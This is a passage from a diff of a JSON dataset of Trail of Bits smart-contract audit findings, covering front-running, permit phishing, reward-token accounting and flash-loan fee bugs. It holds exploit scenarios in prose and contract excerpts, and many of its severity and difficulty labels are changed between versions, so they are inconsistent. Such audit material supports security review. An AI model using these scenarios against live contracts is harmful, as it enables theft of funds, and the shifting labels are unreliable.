user of the Yield Protocol, opens an overcollateralized vault. Attacker Bob calls payAll on Alice's vault. As a result, Alice's vault is liquidated, and she loses the excess collateral (the portion that made the vault overcollateralized). Recommendations Short term, ensure that buy and payAll fail if they are called on a vault for which there is no active auction. Long term, ensure that all functions revert if the system is in a state in which they are not allowed to be called.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Low" ] }, @@ -785,8 +755,8 @@ "body": "The Yield Protocol V2 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. 
Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Yield Protocol V2 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -795,7 +765,7 @@ "body": "The use of EIP-2612 increases the risk of permit function front-running as well as phishing attacks. EIP-2612 uses signatures as an alternative to the traditional approve and transferFrom flow. These signatures allow a third party to transfer tokens on behalf of a user, with verification of a signed message. The use of EIP-2612 makes it possible for an external party to front-run the permit function by submitting the signature first. Then, since the signature has already been used and the funds have been transferred, the actual caller's transaction will fail. This could also affect external contracts that rely on a successful permit() call for execution. EIP-2612 also makes it easier for an attacker to steal a user's tokens through phishing by asking for signatures in a context unrelated to the Yield Protocol contracts. The hash message may look benign and random to the user. Exploit Scenario Bob has 1,000 iTokens. Eve creates an ERC20 token with a malicious airdrop called ProofOfSignature. To claim the tokens, participants must sign a hash. Eve generates a hash to transfer 1,000 iTokens from Bob. Eve asks Bob to sign the hash to get free tokens. Bob signs the hash, and Eve uses it to steal Bob's tokens. Recommendations Short term, develop user documentation on edge cases in which the signature-forwarding process can be front-run or an attacker can steal a user's tokens via phishing. Long term, document best practices for Yield Protocol users. In addition to taking other precautions, users must do the following: be extremely careful when signing a message; avoid signing messages from suspicious sources; and always require hashing schemes to be public. References: EIP-2612 Security Considerations", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -805,7 +775,7 @@ "body": "The Yield Protocol relies on users interacting with the Ladle contract to batch their transactions (e.g., to transfer funds and then mint/burn the corresponding tokens in the same series of transactions). When they deviate from the batched transaction flow, users may lose their funds through front-running. 
For example, an attacker could front-run the startPool() function to steal the initial mint of strategy tokens. The function relies on liquidity provider (LP) tokens to be transferred to the Strategy contract and then used to mint strategy tokens. The first time that strategy tokens are minted, they are minted directly to the caller: /// @dev Start the strategy investments in the next pool /// @notice When calling this function for the first pool, some underlying needs to be transferred to the strategy first, using a batchable router. function startPool() external poolNotSelected { [...] // Find pool proportion p = tokenReserves/(tokenReserves + fyTokenReserves) // Deposit (investment * p) base to borrow (investment * p) fyToken // (investment * p) fyToken + (investment * (1 - p)) base = investment // (investment * p) / ((investment * p) + (investment * (1 - p))) = p // (investment * (1 - p)) / ((investment * p) + (investment * (1 - p))) = 1 - p uint256 baseBalance = base.balanceOf(address(this)); require(baseBalance > 0, \"No funds to start with\"); uint256 baseInPool = base.balanceOf(address(pool_)); uint256 fyTokenInPool = fyToken_.balanceOf(address(pool_)); uint256 baseToPool = (baseBalance * baseInPool) / (baseInPool + fyTokenInPool); // Rounds down uint256 fyTokenToPool = baseBalance - baseToPool; // fyTokenToPool is rounded up // Mint fyToken with underlying base.safeTransfer(baseJoin, fyTokenToPool); fyToken.mintWithUnderlying(address(pool_), fyTokenToPool); // Mint LP tokens with (investment * p) fyToken and (investment * (1 - p)) base base.safeTransfer(address(pool_), baseToPool); (,, cached) = pool_.mint(address(this), true, 0); // We don't care about slippage, because the strategy holds to maturity and profits from sandwiching if (_totalSupply == 0) _mint(msg.sender, cached); // Initialize the strategy if needed invariants[address(pool_)] = pool_.invariant(); // Cache the invariant to help the frontend calculate profits emit PoolStarted(address(pool_)); } Figure 9.1: strategy-v2/contracts/Strategy.sol#L146-L194 Exploit Scenario Bob adds underlying tokens to the Strategy contract without using the router. Governance calls setNextPool() with a new pool address. Eve, an attacker, front-runs the call to the startPool() function to secure the strategy tokens initially minted for Bob's underlying tokens. Recommendations Short term, to limit the impact of function front-running, avoid minting tokens to the callers of the protocol's functions. Long term, document the expectations around the use of the router to batch transactions; that way, users will be aware of the front-running risks that arise when it is not used. Additionally, analyze the implications of all uses of msg.sender in the system, and ensure that users cannot leverage it to obtain tokens that they do not deserve; otherwise, they could be incentivized to engage in front-running.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Medium" ] }, @@ -815,27 +785,7 @@ "body": "Strategy contract functions use the contract's balance to determine how many liquidity or base tokens to provide to a user minting or burning tokens. The Strategy contract inherits from the ERC20Rewards contract, which defines a reward token and a reward distribution schedule. An admin must send reward tokens to the Strategy contract to fund its reward payouts. This flow relies on an underlying assumption that the reward token will be different from the base token. /// @dev Set a rewards token. 
/// @notice Careful, this can only be done once. function setRewardsToken(IERC20 rewardsToken_) external auth { require(rewardsToken == IERC20(address(0)), \"Rewards token already set\"); rewardsToken = rewardsToken_; emit RewardsTokenSet(rewardsToken_); } Figure 10.1: yield-utils-v2/contracts/token/ERC20Rewards.sol#L58-L67 The burnForBase() function tracks the Strategy contract's base token balance. If the base token is used as the reward token, the contract's base token balance will be inflated to include the reward token balance (and the balance tracked by the function will be incorrect). As a result, when attempting to burn strategy tokens, a user may receive more base tokens than he or she deserves for the number of strategy tokens being burned: /// @dev Burn strategy tokens to withdraw base tokens. It can be called only when a pool is not selected. /// @notice The strategy tokens that the user burns need to have been transferred previously, using a batchable router. function burnForBase(address to) external poolNotSelected returns (uint256 withdrawal) { // strategy * burnt/supply = withdrawal uint256 burnt = _balanceOf[address(this)]; withdrawal = base.balanceOf(address(this)) * burnt / _totalSupply; _burn(address(this), burnt); base.safeTransfer(to, withdrawal); } Figure 10.2: strategy-v2/contracts/Strategy.sol#L258-L271 Exploit Scenario Bob deploys the Strategy contract; DAI is set as a base token of that contract and is also defined as the reward token in the ERC20Rewards contract. After a pool has officially been closed, Eve uses burnForBase() to swap strategy tokens for base tokens. Because the calculation takes into account the base token balance, she receives more base tokens than she should. Recommendations Short term, add checks to verify that the reward token is not set to the base token, liquidity token, fyToken, or strategy token. These checks will ensure that users cannot leverage contract balances that include reward token balances to turn a profit. Long term, analyze all token interactions in the contract to ensure they do not introduce unexpected behavior into the system. 11. Insufficient protection of sensitive keys Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-YP2-011 Target: hardhat.config.js", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one Curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig, the pool's address is not checked against the TriCrypto pool's address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in figure 15.1. If the configuration is incorrect, a different token may be unintentionally transferred. if (unwrap) { // unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins(2); [...] 
Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy.sol:377-379 Exploit Scenario The Curve pool array, coins, stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "16. Improper validation of Chainlink data ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overflow (e.g., uint(-1)) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reflect recent changes. It is best practice to define a window in which data is considered sufficiently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt. (, int256 price, , , ) = _aggregator.latestRoundData(); return uint256(price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has finished and that the pricing data is from the current round. Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)).", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Medium" ] }, @@ -845,8 +795,8 @@ "body": "MakerDAO's Dutch auction system imposes limits on the amount of collateral that can be auctioned off at once (both the total amount and the amount of each collateral type). If the MakerDAO system experienced a temporary oracle failure, these limits would prevent a catastrophic loss of all collateral. The Yield Protocol auction system is similar to MakerDAO's but lacks such limits, meaning that all of its collateral could be auctioned off for below-market prices. Exploit Scenario The oracle price feeds (or other components of the system) experience an attack or another issue. The incident causes a majority of the vaults to become undercollateralized, triggering auctions of those vaults' collateral. The protocol then loses the majority of its collateral, which is auctioned off for below-market prices, and enters an undercollateralized state from which it cannot recover. Recommendations Short term, introduce global and type-specific limits on the amount of collateral that can be auctioned off at the same time. Ensure that these limits protect the protocol from total liquidation caused by bugs while providing enough liquidation throughput to accommodate all possible price changes. Long term, wherever possible, introduce limits for the system's variables to ensure that they remain within the expected ranges. These limits will minimize the impact of bugs or attacks against the system. 
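As a sketch of what such limits could look like (hypothetical names, loosely modeled on MakerDAO's per-collateral and global liquidation caps rather than on the Witch contract's actual storage): uint128 public maxGlobalAuctioned; mapping (bytes6 => uint128) public maxIlkAuctioned; uint128 public globalAuctioned; mapping (bytes6 => uint128) public ilkAuctioned; and, inside auction(), require(globalAuctioned + ink <= maxGlobalAuctioned, \"Global auction limit reached\"); require(ilkAuctioned[ilkId] + ink <= maxIlkAuctioned[ilkId], \"Ilk auction limit reached\"); with both counters incremented there and decremented as auctions settle. 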
", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -855,7 +805,7 @@ "body": "Users call the Witch contract's auction function to start auctions for undercollateralized vaults. To reduce the losses incurred by the protocol, this function should be called as soon as possible after a vault has become undercollateralized. However, the Yield Protocol system does not provide users with a direct incentive to call Witch.auction. By contrast, the MakerDAO system provides rewards to users who initialize auctions. Exploit Scenario A stock market crash triggers a crypto market crash. The numerous corrective arbitrage transactions on the Ethereum network cause it to become congested, and gas prices skyrocket. To keep the Yield Protocol overcollateralized, many undercollateralized vaults must be auctioned off. However, because of the high price of calls to Witch.auction, and the lack of incentives for users to call it, too few auctions are started in time. As a result, the system incurs greater losses than it would have if more auctions had been started on time. Recommendations Short term, reward those who call Witch.auction to incentivize users to call the function (and to do so as soon as possible). Long term, ensure that users are properly incentivized to perform all important operations in the protocol.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: Low" ] }, @@ -865,7 +815,7 @@ "body": "Math64x64 has been copied and pasted into the yieldspace-v2 repository. The code documentation does not specify the exact revision that was made or whether the code was modified. As such, the contracts will not reliably reflect updates or security fixes implemented in this dependency, as those changes must be manually integrated into the contracts. Exploit Scenario Math64x64 receives an update with a critical fix for a vulnerability. An attacker detects the use of a vulnerable contract and can then exploit the vulnerability against any of the Yield Protocol contracts that use Math64x64. Recommendations Short term, review the codebase and document the source and version of the dependency. Include third-party sources as submodules in your Git repositories to maintain internal path consistency and ensure that any dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, @@ -876,7 +826,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -886,7 +836,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -896,7 +846,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: N/A" + "Difficulty: Undetermined" ] }, { @@ -905,8 +855,8 @@ "body": "Strategy contract functions use the contract's balance to determine how many liquidity or base tokens to provide to a user minting or burning tokens. The Strategy contract inherits from the ERC20Rewards contract, which defines a reward token and a reward distribution schedule. An admin must send reward tokens to the Strategy contract to fund its reward payouts. This flow relies on an underlying assumption that the reward token will be different from the base token. /// @dev Set a rewards token. 
/// @notice Careful, this can only be done once. function setRewardsToken(IERC20 rewardsToken_) external auth { require(rewardsToken == IERC20(address(0)), \"Rewards token already set\"); rewardsToken = rewardsToken_; emit RewardsTokenSet(rewardsToken_); } Figure 10.1: yield-utils-v2/contracts/token/ERC20Rewards.sol#L58-L67 The burnForBase() function tracks the Strategy contract's base token balance. If the base token is used as the reward token, the contract's base token balance will be inflated to include the reward token balance (and the balance tracked by the function will be incorrect). As a result, when attempting to burn strategy tokens, a user may receive more base tokens than he or she deserves for the number of strategy tokens being burned: /// @dev Burn strategy tokens to withdraw base tokens. It can be called only when a pool is not selected. /// @notice The strategy tokens that the user burns need to have been transferred previously, using a batchable router. function burnForBase(address to) external poolNotSelected returns (uint256 withdrawal) { // strategy * burnt/supply = withdrawal uint256 burnt = _balanceOf[address(this)]; withdrawal = base.balanceOf(address(this)) * burnt / _totalSupply; _burn(address(this), burnt); base.safeTransfer(to, withdrawal); } Figure 10.2: strategy-v2/contracts/Strategy.sol#L258-L271 Exploit Scenario Bob deploys the Strategy contract; DAI is set as a base token of that contract and is also defined as the reward token in the ERC20Rewards contract. After a pool has officially been closed, Eve uses burnForBase() to swap strategy tokens for base tokens. Because the calculation takes into account the base token balance, she receives more base tokens than she should. Recommendations Short term, add checks to verify that the reward token is not set to the base token, liquidity token, fyToken, or strategy token. These checks will ensure that users cannot leverage contract balances that include reward token balances to turn a profit. Long term, analyze all token interactions in the contract to ensure they do not introduce unexpected behavior into the system.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: High", + "Difficulty: Medium" ] }, { @@ -915,8 +865,8 @@ "body": "Sensitive information such as Etherscan keys, API keys, and an owner private key used in testing is stored in the process environment. This method of storage could make it easier for an attacker to compromise the keys; compromise of the owner key, for example, could enable an attacker to gain owner privileges and steal funds from the protocol. The following portion of the hardhat.config.js file uses secrets from the process environment: let mnemonic = process.env.MNEMONIC if (!mnemonic) { try { mnemonic = fs.readFileSync(path.resolve(__dirname, '.secret')).toString().trim() } catch(e){} } const accounts = mnemonic ? { mnemonic, } : undefined let etherscanKey = process.env.ETHERSCANKEY if (!etherscanKey) { try { etherscanKey = fs.readFileSync(path.resolve(__dirname, '.etherscanKey')).toString().trim() } catch(e){} } Figure 11.1: vault-v2/hardhat.config.ts#L67-L82 Exploit Scenario Alice, a member of the Yield team, has secrets stored in the process environment. Eve, an attacker, gains access to Alice's device and extracts the Infura and owner keys from it. Eve then launches a denial-of-service attack against the front end of the system and uses the owner key to steal the funds held by the owner on the mainnet. 
Recommendations Short term, to prevent attackers from accessing system funds, avoid using hard-coded secrets or storing secrets in the process environment. Long term, use a hardware security module to ensure that keys can never be extracted.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -926,7 +876,67 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" + ] + }, + { + "title": "1. receiveFlashLoan does not account for fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The receiveFlashLoan functions of the scWETHv2 and scUSDCv2 vaults ignore the Balancer flash loan fees and repay exactly the amount that was loaned. This is not currently an issue because the Balancer vault does not charge any fees for flash loans. However, if Balancer implements fees for flash loans in the future, the Sandclock vaults would be prevented from withdrawing investments back into the vault. function flashLoan ( IFlashLoanRecipient recipient, IERC20[] memory tokens, uint256[] memory amounts, bytes memory userData ) external override nonReentrant whenNotPaused { uint256[] memory feeAmounts = new uint256[](tokens.length); uint256[] memory preLoanBalances = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 amount = amounts[i]; preLoanBalances[i] = token.balanceOf(address(this)); feeAmounts[i] = _calculateFlashLoanFeeAmount(amount); token.safeTransfer(address(recipient), amount); } recipient.receiveFlashLoan(tokens, amounts, feeAmounts, userData); for (uint256 i = 0; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 preLoanBalance = preLoanBalances[i]; uint256 postLoanBalance = token.balanceOf(address(this)); uint256 receivedFeeAmount = postLoanBalance - preLoanBalance; _require(receivedFeeAmount >= feeAmounts[i]); _payFeeAmount(token, receivedFeeAmount); } } Figure 1.1: Abbreviated code showing the receivedFeeAmount check in the Balancer flashLoan method in 0xBA12222222228d8Ba445958a75a0704d566BF2C8#code#F5#L78 In the Balancer flashLoan function, shown in figure 1.1, the contract calls the recipient's receiveFlashLoan function with four arguments: the addresses of the tokens loaned, the amounts for each token, the fees to be paid for the loan for each token, and the calldata provided by the caller. The Sandclock vaults ignore the fee amount and repay only the principal, which would lead to reverts if the fees are ever changed to nonzero values. Although this problem is present in multiple vaults, the receiveFlashLoan implementation of the scWETHv2 contract is shown in figure 1.2 as an illustrative example: function receiveFlashLoan ( address[] memory, uint256[] memory amounts, uint256[] memory, bytes memory userData) external { _isFlashLoanInitiated(); // the amount flashloaned uint256 flashLoanAmount = amounts[0]; // decode user data bytes[] memory callData = abi.decode(userData, (bytes[])); _multiCall(callData); // payback flashloan asset.safeTransfer(address(balancerVault), flashLoanAmount); _enforceFloat(); } Figure 1.2: The feeAmounts parameter is ignored by the receiveFlashLoan method. 
( sandclock-contracts/src/steth/scWETHv2.sol#L232-L249 ) Exploit Scenario After Sandclock's scUSDCv2 and scWETHv2 vaults are deployed and users start depositing assets, the Balancer governance system decides to start charging fees for flash loans. Users of the Sandclock protocol now discover that, apart from the float margin, most of their funds are locked because it is impossible to use the flash loan functions to withdraw vault assets from the underlying investment pools. Recommendations Short term, use the feeAmounts parameter in the calculation for repayment to account for future Balancer flash loan fees. This will prevent unexpected reverts in the flash loan handler function. Long term, document and justify all ignored arguments provided by external callers. This will facilitate a review of the system's third-party interactions and help prevent similar issues from being introduced in the future.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Reward token distribution rate can diverge from reward token balance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The privileged distributor role is responsible for transferring reward tokens to the RewardTracker contract and then passing the number of tokens sent as the _reward parameter to the notifyRewardAmount method. However, the _reward parameter provided to this method can be larger than the number of reward tokens transferred. Given the accounting for leftover rewards, such a situation would be difficult to recover from. /// @notice Lets a reward distributor start a new reward period. The reward tokens must have already /// been transferred to this contract before calling this function. If it is called /// when a reward period is still active, a new reward period will begin from the time /// of calling this function, using the leftover rewards from the old reward period plus /// the newly sent rewards as the reward. /// @dev If the reward amount will cause an overflow when computing rewardPerToken, then /// this function will revert. /// @param _reward The amount of reward tokens to use in the new reward period. function notifyRewardAmount (uint256 _reward) external onlyDistributor { _notifyRewardAmount(_reward); } Figure 2.1: The comment on the notifyRewardAmount method hints at an unenforced assumption that the number of reward tokens transferred must be equal to the _reward parameter provided. ( sandclock-contracts/src/staking/RewardTracker.sol#L185-L195 ) If a _reward value smaller than the actual number of transferred tokens is provided, the situation can be fixed by calling notifyRewardAmount again with a _reward parameter that accounts for the difference between the RewardTracker contract's actual token balance and the rewards already scheduled for distribution. This solution is possible because the _notifyRewardAmount helper function accounts for leftover rewards if it is called during an ongoing reward period. function _notifyRewardAmount (uint256 _reward) internal { ... uint64 rewardRate_ = rewardRate; uint64 periodFinish_ = periodFinish; uint64 duration_ = duration; ... 
if (block.timestamp >= periodFinish_) { newRewardRate = _reward / duration_; } else { uint256 remaining = periodFinish_ - block.timestamp; uint256 leftover = remaining * rewardRate_; newRewardRate = (_reward + leftover) / duration_; } Figure 2.2: The accounting for leftover rewards in the _notifyRewardAmount helper method ( sandclock-contracts/src/staking/RewardTracker.sol#L226-L262 ) This accounting for leftover rewards, however, makes the situation difficult to recover from if a _reward parameter that is too large is provided to the notifyRewardAmount method. As shown by the arithmetic in figure 2.2, if the reward period has not finished, the code for creating the newRewardRate value can only add to the reward distribution, not subtract from it. The only way to bring a too-large reward distribution back in line with the RewardTracker contract's reward token balance is to transfer additional reward tokens to the contract. Exploit Scenario The RewardTracker distributor transfers 10 reward tokens to the RewardTracker contract and then mistakenly calls the notifyRewardAmount method with a _reward parameter of 100. Some users call the claimRewards method early and receive inflated rewards until the contract's balance is depleted, leaving later users unable to claim any rewards. To recover, the distributor either needs to provide another 90 reward tokens to the RewardTracker contract or accept the reputational loss of allowing this misconfigured reward period to finish before resetting the reward payouts correctly during the next period. Recommendations Short term, modify the _notifyRewardAmount helper function to reset the rewardRate so that it is in line with the current rewardToken balance and the time remaining in the reward period. This change could also allow the fetchRewards method to maintain its current behavior but with only a single rewardToken.balanceOf external call. Long term, review the internal accounting state variables and document the ways in which they are influenced by the actual flow of funds. Pay attention to any internal accounting values that can be influenced by external sources, including privileged accounts, and reexamine the system's assumptions surrounding the flow of funds.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. Miscalculation in beforeWithdraw can leave the vault with less than minimum float ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "When a user wants to redeem or withdraw, the beforeWithdraw function is called with the number of assets to be withdrawn as the assets parameter. This function makes sure that if the value of the float parameter (that is, the available assets in the vault) is not enough to pay for the withdrawal, the strategy gets some assets back from the pools to be able to pay. function beforeWithdraw (uint256 assets, uint256) internal override { uint256 float = asset.balanceOf(address(this)); if (assets <= float) return; uint256 minimumFloat = minimumFloatAmount; uint256 floatRequired = float < minimumFloat ? minimumFloat - float : 0; uint256 missing = assets + floatRequired - float; _withdrawToVault(missing); } Figure 3.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L386-L396 When the float value is enough, the function returns and the withdrawal is paid with the existing float. If the float value is not enough, the missing amount is recovered from the pools via the adapters. 
The issue lies in the calculation of the missing parameter: it does not guarantee that the float value remaining after the withdrawal is at least the value of the minimumFloatAmount parameter. The consequence is that the calculation always leaves a float equal to floatRequired in the vault. If this value is small enough, it can cause users to waste gas when withdrawing small amounts because they will need to pay for the gas-intensive _withdrawToVault action. This eclipses the usefulness of having the float in the vault. The correct calculation should be uint256 missing = assets + minimumFloat - float; . Using this correct calculation would make the calculation of the floatRequired parameter unnecessary as it would no longer be required or used in the rest of the code. Exploit Scenario The value for minimumFloatAmount is set to 1 ether in the scWETHv2 contract. For this scenario, suppose that the current float is exactly equal to minimumFloatAmount . Alice wants to withdraw 0.15 WETH from her invested amount. Because this amount is less than the current float, her withdrawal is paid from the vault assets, leaving the float equal to 0.85 WETH after the operation. Then, Bill wants to withdraw 0.9 WETH, but the vault has no available assets to pay for it. In this case, when beforeWithdraw is called, Bill has to pay gas for the call to _withdrawToVault , which is an expensive action because it includes gas-intensive operations such as loops and a flash loan. After Bill's withdrawal, the float in the vault is 0.15 WETH. This is a relatively small amount compared with minimumFloatValue , and it will likely make the next withdrawing/redeeming user also have to pay for the call to _withdrawToVault . Recommendations Short term, replace the calculation of the missing amount to be withdrawn on line 393 of the scWETHv2 contract with assets + minimumFloat - float . This calculation will ensure that the minimum float restriction is enforced after withdrawals. It will take the required float into consideration, so the separate calculation of floatRequired on line 392 of scWETHv2 would no longer be required. Long term, add unit or fuzz tests to make sure that the vault has an amount of assets equal to or greater than the minimum expected amount at all times.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4. Last user in scWETHv2 vault will not be able to withdraw their funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "When a user wants to withdraw, the withdrawal amount is checked against the current vault float (the uninvested assets readily available in the vault). If the withdrawal amount is less than the float, the amount is paid from the available balance; otherwise, the protocol has to disinvest from the strategies to get the required assets to pay for the withdrawal. The issue with this approach is that in order to maintain a float equal to the minimumFloatValue parameter in the vault, the value to be disinvested from the strategies is calculated in the beforeWithdraw function, and its correct value is equal to the sum of the amount to be withdrawn and the minimum float minus the current float. If there is only one user remaining in the vault and they want to withdraw, this enforcement will not allow them to do so, because there will not be enough invested in the strategies to leave a minimum float in the vault after the withdrawal.
They would only be able to withdraw their assets minus the minimum float at most. The code for the _withdrawToVault function is shown in figure 4.1. The line highlighted in the figure would cause the revert in this situation, as there would not be enough invested to supply the requested amount. function _withdrawToVault ( uint256 _amount ) internal { uint256 n = protocolAdapters.length(); uint256 flashLoanAmount ; uint256 totalInvested_ = _totalCollateralInWeth() - totalDebt(); bytes [] memory callData = new bytes [](n + 1 ); uint256 flashLoanAmount_ ; uint256 amount_ ; uint256 adapterId ; address adapter ; for ( uint256 i ; i < n; i++) { (adapterId, adapter) = protocolAdapters.at(i); (flashLoanAmount_, amount_) = _calcFlashLoanAmountWithdrawing(adapter, _amount, totalInvested_); flashLoanAmount += flashLoanAmount_; callData[i] = abi.encodeWithSelector( this .repayAndWithdraw.selector, adapterId, flashLoanAmount_, priceConverter.ethToWstEth(flashLoanAmount_ + amount_) ); } // needed otherwise counted as loss during harvest totalInvested -= _amount; callData[n] = abi.encodeWithSelector(scWETHv2.swapWstEthToWeth.selector, type( uint256 ).max, slippageTolerance); uint256 float = asset.balanceOf( address ( this )); _flashLoan(flashLoanAmount, callData); emit WithdrawnToVault(asset.balanceOf( address ( this )) - float); } Figure 4.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L342-L376 Additionally, when this revert occurs, an integer overflow is given as the reason, which obscures the real reason and can make the user's experience more confusing. Exploit Scenario Bob is the only remaining user in a scWETHv2 vault, and he has 2 ether invested. He wants to withdraw his assets, but all of his calls to the withdrawal function keep reverting due to an integer overflow. He keeps trying, wasting gas in the process, until he discovers that the maximum amount he is allowed to withdraw is around 1 ether. The rest of his funds are locked in the vault until the keeper makes a manual call to withdrawToVault or until the admin lowers the minimum float value. Recommendations Short term, fix the calculation of the amount to be withdrawn and make sure that it never exceeds the total invested amount. Long term, add end-to-end unit or fuzz tests that are representative of the way multiple users can interact with the protocol. Test for edge cases involving various numbers of users, investment amounts, and critical interactions, and make sure that the protocol's invariants hold and that users do not lose access to funds in the event of such edge cases.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "5. Lido stake rate limit could lead to unexpected reverts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "To mitigate the effects of a surge in demand for stETH on the deposit queue, Lido has implemented a rate limit for stake submissions. This rate limit is ignored by the lidoSwapWethToWstEth method of the Swapper library, potentially leading to unexpected reversions. The Lido stETH integration guide states the following: To avoid [reverts due to the rate limit being hit], you should check if getCurrentStakeLimit() >= amountToStake , and if it's not you can go with an alternative route.
function lidoSwapWethToWstEth ( uint256 _wethAmount ) external { // weth to eth weth.withdraw(_wethAmount); // stake to lido / eth => stETH stEth.submit{value: _wethAmount}( address ( 0x00 )); // stETH to wstEth uint256 stEthBalance = stEth.balanceOf( address ( this )); ERC20( address (stEth)).safeApprove( address (wstETH), stEthBalance); wstETH.wrap(stEthBalance); } Figure 5.1: The submit method is subject to a rate limit that is not taken into account. ( sandclock-contracts/src/steth/Swapper.sol#L130-L142 ) Exploit Scenario A surge in demand for Ethereum validators leads many people using Lido to stake ETH, causing the Lido rate limit to be hit, and the submit method of the stEth contract begins to revert. As a result, the Sandclock keeper is unable to deposit despite the presence of alternate routes to obtain stETH, such as through Curve or Balancer. Recommendations Short term, have the lidoSwapWethToWstEth method of the Swapper library check whether the amount being deposited is less than the value returned by the getCurrentStakeLimit method of the stEth contract. If it is not, have the code use ZeroEx to swap or revert with a message that clearly communicates the reason for the failure. Long term, review the documentation for all third-party interactions and note any situations in which the integration could revert unexpectedly. If such reversions are acceptable, clearly document how they could occur and include a justification for this acceptance in the inline comments.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Chainlink oracles could return stale price data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The latestRoundData() function from Chainlink oracles returns five values: roundId , answer , startedAt , updatedAt , and answeredInRound . The PriceConverter contract reads only the answer value and discards the rest. This can cause outdated prices to be used for token conversions, such as the ETH-to-USDC conversion shown in figure 6.1. function ethToUsdc ( uint256 _ethAmount ) public view returns ( uint256 ) { ( , int256 usdcPriceInEth ,,, ) = 